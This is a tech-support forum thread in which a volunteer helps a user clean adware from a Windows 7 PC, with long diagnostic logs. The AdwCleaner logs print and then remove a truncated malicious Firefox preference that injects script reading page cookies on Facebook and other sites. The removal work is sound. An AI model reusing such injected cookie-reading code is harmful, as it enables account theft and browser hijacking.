Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Windows not genuine messages, Codec V malware


  • This topic is locked This topic is locked
16 replies to this topic

#1 phill!

phill!

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 25 September 2014 - 11:44 AM

Hello there, I originally posted under "Am I infected? What do I do?"

http://www.bleepingcomputer.com/forums/t/549460/malware-counterfeit-messages-cant-update/

 

A friend of mine was getting a "hard drive failure imminent" message when she rebooted her 64-bit Windows 7 Home Premium machine.  I created a system image using Windows and then used an install disc and restored the image on her new hard drive.  Ever since then she's been getting a message telling her that Windows may not be genuine.

 

When I view her computer properties it says that Windows is activated.  I've seen other people post that a hard drive swap caused windows to forget it was activated but I'm about half convinced it's actually a malware issue.  I've run a Malwarebytes scan, Immunet 3 scan, Spybot S&D, ADWcleaner, and they all come back with something at least the first couple scans.  I'm still seeing ads from Codec V, even on my own personal site that has no similar ads.  If I try to run Windows Update it says that the service is not running but I've personally restarted the Windows Update service several times and that doesn't change.

 

I included a mgadiag log in the original post and then when asked replied with the following:

1. checkup.txt from SecurityCheck.exe

2. FSS.txt from Farbar Service Scanner

3. Result.txt from MiniToolBox

4. Malwarebytes Anti-Malware scan results

5. mbar-log...txt & system-log.txt from Malwarebytes Anti-Rootkit

6. rKill.txt

 

Below is my most recently asked for DDS.txt log.  And attached is my DSS attach.zip.

 

Thank you very much,

Phil

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.17239
Run by Camille at 11:19:13 on 2014-09-25
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6134.4190 [GMT -5:00]
.
AV: Microsoft Security Essentials *Disabled/Updated* {108DAC43-C256-20B7-BB05-914135DA5160}
AV: Immunet 3 *Enabled/Updated* {D3417D79-6FAC-4B50-D487-4BA8768A0AA4}
SP: Microsoft Security Essentials *Disabled/Updated* {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Enabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\System32\svchost.exe -k NetworkService
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
C:\Program Files\Immunet\3.1.13\sfc.exe
C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\Program Files\Immunet\3.1.13\iptray.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\taskeng.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\WUDFHost.exe
c:\program files (x86)\teamviewer\version9\TeamViewer_Desktop.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Windows Live Messenger Companion Helper: {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
BHO: Skype Browser Helper: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
BHO: Adblock Plus for IE Browser Helper Object: {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll
mRun: [Immunet Protect] "C:\Program Files\Immunet\3.1.13\iptray.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
IE: {0000036B-C524-4050-81A0-243669A86B9F} - {B63DBA5F-523F-4B9C-A43D-65DF1977EAD3} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: $talisma_url$
DPF: {1239CC52-59EF-4DFA-8C61-90FFA846DF7E} - hxxp://www.musicnotes.com/download/mnviewer.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {3107C2A8-9F0B-4404-A58B-21BD85268FBC} - hxxp://www.pogo.com/cdl/launcher/PogoWebLauncherInstaller.CAB
DPF: {8100D56A-5661-482C-BEE8-AFECE305D968} - hxxp://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab
DPF: {A8F2B9BD-A6A0-486A-9744-18920D898429} - hxxp://www.sibelius.com/download/software/win/ActiveXPlugin.cab
DPF: {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab
DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} - hxxp://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://hscvpn.uthscsa.edu/dana-cached/sc/JuniperSetupClient.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{6D210378-D3EC-42F6-9AD7-399C50A47598} : DHCPNameServer = 192.168.1.254
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Skype add-on for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Adblock Plus for IE Browser Helper Object: {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-DPF: {AA570693-00E2-4907-B6F1-60A1199B030C} - hxxps://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\
FF - prefs.js: browser.search.defaulturl - 
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - about:home
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Common Files\Motive\npMotive.dll
FF - plugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\Camille\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll
.
============= SERVICES / DRIVERS ===============
.
R1 ImmunetProtectDriver;ImmunetProtectDriver;C:\Windows\System32\drivers\immunetprotect.sys [2014-9-3 58064]
R1 ImmunetSelfProtectDriver;ImmunetSelfProtectDriver;C:\Windows\System32\drivers\immunetselfprotect.sys [2014-9-3 32976]
R1 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2011-4-18 189440]
R2 ImmunetNetworkMonitorDriver;ImmunetNetworkMonitorDriver;C:\Windows\System32\drivers\ImmunetNetworkMonitor.sys [2014-9-3 100048]
R2 ImmunetProtect;Immunet 3;C:\Program Files\Immunet\3.1.13\sfc.exe [2014-9-3 546208]
R2 PassThru Service;Internet Pass-Through Service;C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [2013-12-7 167424]
R2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-9-21 1738168]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-9-21 2088408]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-9-21 171928]
R2 Skype C2C Service;Skype C2C Service;C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe [2012-11-22 3290304]
R2 TeamViewer9;TeamViewer 9;C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe [2014-9-21 4799760]
R3 MpNWMon;Microsoft Malware Protection Network Driver;C:\Windows\System32\drivers\MpNWMon.sys [2011-4-18 40832]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2009-10-8 233472]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 fssfltr;fssfltr;C:\Windows\System32\drivers\fssfltr.sys [2011-12-4 48488]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2011-5-13 1492840]
S3 HTCAND64;HTC Device Driver;C:\Windows\System32\drivers\ANDROIDUSB.sys [2009-11-2 33736]
S3 htcnprot;HTC NDIS Protocol Driver;C:\Windows\System32\drivers\htcnprot.sys [2012-12-7 36928]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-8-15 111616]
S3 LVPr2M64;Logitech LVPr2M64 Driver;C:\Windows\System32\drivers\LVPr2M64.sys [2009-10-7 30232]
S3 LVUVC64;Logitech Webcam 120(UVC);C:\Windows\System32\drivers\lvuvc64.sys [2009-10-7 6379288]
S3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2011-4-27 84864]
S3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [2011-4-27 288272]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-4-14 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2013-4-14 57856]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2010-3-11 1255736]
S4 LVPrcS64;Process Monitor;C:\Program Files\Common Files\logishrd\LVMVFM\LVPrcSrv.exe [2009-10-7 191000]
S4 McciCMService64;McciCMService64;C:\Program Files\Common Files\Motive\McciCMService.exe [2011-6-20 517632]
S4 McciServiceHost;McciServiceHost;"C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" --> C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe [?]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
FileExt: .inf: inffile=C:\Windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-09-24 14:00:41 -------- d-----w- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-23 16:09:58 -------- d-----w- C:\MGADiagToolOutput
2014-09-23 15:52:49 972264 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{394FDFDE-6E2F-49A5-9A32-6C391F41BCC2}\gapaengine.dll
2014-09-23 15:52:45 -------- d-sh--w- C:\$RECYCLE.BIN
2014-09-23 15:41:45 98816 ----a-w- C:\Windows\sed.exe
2014-09-23 15:41:45 256000 ----a-w- C:\Windows\PEV.exe
2014-09-23 15:41:45 208896 ----a-w- C:\Windows\MBR.exe
2014-09-23 15:40:54 -------- d-s---w- C:\ComboFix
2014-09-23 15:22:37 -------- d-----w- C:\Windows\ERUNT
2014-09-23 15:08:55 972264 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{5885BE9D-013D-415A-81C2-188516B3B288}\gapaengine.dll
2014-09-22 02:28:19 -------- d-----w- C:\AdwCleaner
2014-09-22 02:10:49 -------- d-----w- C:\Users\Camille\AppData\Roaming\TeamViewer
2014-09-22 02:10:45 -------- d-----w- C:\Program Files (x86)\TeamViewer
2014-09-22 01:52:07 -------- d-----w- C:\Windows\System32\catroot2
2014-09-22 01:51:58 21040 ----a-w- C:\Windows\System32\sdnclean64.exe
2014-09-22 01:51:56 -------- d-----w- C:\ProgramData\Spybot - Search & Destroy
2014-09-22 01:51:49 -------- d-----w- C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-09-22 01:50:57 -------- d-----w- C:\Windows\softwaredistribution.old
2014-09-22 01:30:02 388096 ----a-r- C:\Users\Camille\AppData\Roaming\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2014-09-22 01:30:02 -------- d-----w- C:\Program Files (x86)\Trend Micro
2014-09-03 18:15:11 -------- d-----w- C:\Program Files\Adblock Plus for IE
2014-09-03 18:09:37 -------- d-----w- C:\ProgramData\Immunet
2014-09-03 18:09:27 100048 ----a-w- C:\Windows\System32\drivers\ImmunetNetworkMonitor.sys
2014-09-03 18:09:26 58064 ----a-w- C:\Windows\System32\drivers\immunetprotect.sys
2014-09-03 18:09:26 32976 ----a-w- C:\Windows\System32\drivers\immunetselfprotect.sys
2014-09-03 18:09:25 329800 ----a-w- C:\Windows\System32\drivers\trufos.sys
2014-09-03 18:09:23 -------- d-----w- C:\Program Files\Immunet
2014-09-03 17:25:18 128728 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-09-03 17:25:11 92888 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-09-03 17:25:11 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-09-03 17:25:11 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-28 21:23:13 -------- d-----w- C:\Program Files\CCleaner
2014-08-28 03:50:44 404480 ----a-w- C:\Windows\System32\gdi32.dll
2014-08-28 03:50:44 3163648 ----a-w- C:\Windows\System32\win32k.sys
2014-08-28 03:50:44 311808 ----a-w- C:\Windows\SysWow64\gdi32.dll
.
==================== Find3M  ====================
.
2014-08-07 02:06:41 529920 ----a-w- C:\Windows\System32\aepdu.dll
2014-08-07 02:01:34 424448 ----a-w- C:\Windows\System32\aeinv.dll
2014-07-25 14:02:12 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2014-07-25 14:01:41 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2014-07-25 13:30:30 66048 ----a-w- C:\Windows\System32\iesetup.dll
2014-07-25 13:28:35 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2014-07-25 13:28:27 548352 ----a-w- C:\Windows\System32\vbscript.dll
2014-07-25 13:25:45 83968 ----a-w- C:\Windows\System32\MshtmlDac.dll
2014-07-25 13:04:40 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-07-25 13:00:51 139264 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-07-25 13:00:25 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe
2014-07-25 12:59:28 758272 ----a-w- C:\Windows\System32\jscript9diag.dll
2014-07-25 12:47:25 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-07-25 12:34:49 61952 ----a-w- C:\Windows\SysWow64\iesetup.dll
2014-07-25 12:34:03 455168 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-07-25 12:33:08 51200 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-07-25 12:30:32 61952 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2014-07-25 12:28:15 5824512 ----a-w- C:\Windows\System32\jscript9.dll
2014-07-25 12:28:05 72704 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-07-25 12:10:15 112128 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-07-25 12:08:47 597504 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2014-07-25 12:06:47 4204032 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-07-25 11:43:16 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-07-25 11:39:29 2087936 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-07-25 11:39:25 1249280 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2014-07-25 11:07:49 2001920 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-07-25 11:07:10 1068032 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-07-25 10:52:06 2266624 ----a-w- C:\Windows\System32\wininet.dll
2014-07-25 10:05:23 1792512 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-07-16 03:23:41 2048 ----a-w- C:\Windows\System32\tzres.dll
2014-07-16 02:46:02 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2014-07-14 02:02:45 1216000 ----a-w- C:\Windows\System32\rpcrt4.dll
2014-07-14 01:40:58 664064 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2014-06-30 22:24:50 8856 ----a-w- C:\Windows\System32\icardres.dll
2014-06-30 22:14:53 8856 ----a-w- C:\Windows\SysWow64\icardres.dll
.
============= FINISH: 11:20:01.55 ===============
 

 

 

Attached Files



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:48 PM

Posted 29 September 2014 - 08:03 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

Download the version of this tool for your operating system.
Farbar Recovery Scan Tool (64 bit)
Farbar Recovery Scan Tool (32 bit)
and save it to a folder on your computer's Desktop.
Double-click to run it. When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.
===

Please paste the logs in your next reply DO NOT ATTACH THEM unless specified.
To attach a file select the "More Reply Option" and follow the instructions.

How is the computer running?
Wait for further instructions.

#3 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 30 September 2014 - 03:23 PM

As stated, I had already run ADWcleaner but I ran it again and here's the log:
 
# AdwCleaner v3.310 - Report created 30/09/2014 at 15:09:18
# Updated 12/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Camille - HOMEPC
# Running from : C:\Users\Camille\Desktop\adwcleaner_3.310.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17239
 
 
-\\ Mozilla Firefox v32.0.3 (x86 en-US)
 
[ File : C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\prefs.js ]
 
Line Found : user_pref("extensions.50566b6281242.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
 
*************************
 
AdwCleaner[R0].txt - [25068 octets] - [21/09/2014 21:28:24]
AdwCleaner[R1].txt - [1164 octets] - [23/09/2014 10:05:29]
AdwCleaner[R2].txt - [1027 octets] - [30/09/2014 15:09:18]
AdwCleaner[S0].txt - [25132 octets] - [21/09/2014 21:29:05]
AdwCleaner[S1].txt - [1228 octets] - [23/09/2014 10:07:59]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R2].txt - [1208 octets] ##########


#4 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 30 September 2014 - 03:29 PM

Sorry, this is the log after cleaning/reboot:

 

# AdwCleaner v3.310 - Report created 30/09/2014 at 15:24:08
# Updated 12/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Camille - HOMEPC
# Running from : C:\Users\Camille\Desktop\adwcleaner_3.310.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17239
 
 
-\\ Mozilla Firefox v32.0.3 (x86 en-US)
 
[ File : C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\prefs.js ]
 
Line Deleted : user_pref("extensions.50566b6281242.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
 
*************************
 
AdwCleaner[R0].txt - [25068 octets] - [21/09/2014 21:28:24]
AdwCleaner[R1].txt - [1164 octets] - [23/09/2014 10:05:29]
AdwCleaner[R2].txt - [1288 octets] - [30/09/2014 15:09:18]
AdwCleaner[S0].txt - [25132 octets] - [21/09/2014 21:29:05]
AdwCleaner[S1].txt - [1228 octets] - [23/09/2014 10:07:59]
AdwCleaner[S2].txt - [1211 octets] - [30/09/2014 15:24:08]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1271 octets] ##########


#5 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 30 September 2014 - 03:38 PM

The computer seems to be running fine with the exception of odd browser redirects and the "windows is not genuine" message that pops up every day.

 

FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-09-2014
Ran by Camille (administrator) on HOMEPC on 30-09-2014 15:31:26
Running from C:\Users\Camille\Desktop
Loaded Profile: Camille (Available profiles: Camille)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
